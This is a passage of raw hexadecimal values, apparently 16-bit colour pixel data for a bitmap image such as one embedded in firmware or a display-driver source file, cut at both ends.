0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76,
0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x0000, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0x0000, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0xe8e4, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x0000, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0x0000, 0x7497, 0x7497, 0x7497, 0x0000, 0x0000, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0x0000, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0x0000, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0x0000, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xe8e4, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0x0000, 0xffff, 0x0000, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76,
0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x0000, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0x0000, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0xe8e4, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x0000, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0x0000, 0x0000, 0x0000, 0x0000, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0x0000, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0x0000, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0x0000, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xe8e4, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0x0000, 0xffff, 0xffff, 0xffff, 0x0000, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76,
0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x0000, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0x0000, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0xe8e4, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x0000, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0x0000, 0x0000, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0x0000, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0x0000, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0x0000, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xe8e4, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0x0000, 0xffff, 0xffff, 0xffff, 0xffff, 0x0000, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76,
0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x0000, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0x0000, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0xe8e4, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x0000, 0x0000, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0x0000, 0x0000, 0x0000, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0x0000, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0x0000, 0x0000, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0x0000, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xe8e4, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0x0000, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0x0000, 0x0000, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76,
0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x0000, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0x0000, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0xe8e4, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x0000, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0x0000, 0x0000, 0xffff, 0xffff, 0x0000, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0x0000, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0x0000, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0x0000, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xe8e4, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0x0000, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0x0000, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76,
0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x0000, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0x0000, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0xe8e4, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x0000, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0x0000, 0x0000, 0x0000, 0xffff, 0xffff, 0xffff, 0xffff, 0x0000, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0x0000, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0x0000, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0x0000, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xe8e4, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0x0000, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0x0000, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76,
0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x0000, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0x0000, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0xe8e4, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x0000, 0xf4fc, 0xf4fc, 0xf4fc, 0x0000, 0x0000, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0x0000, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0x0000, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 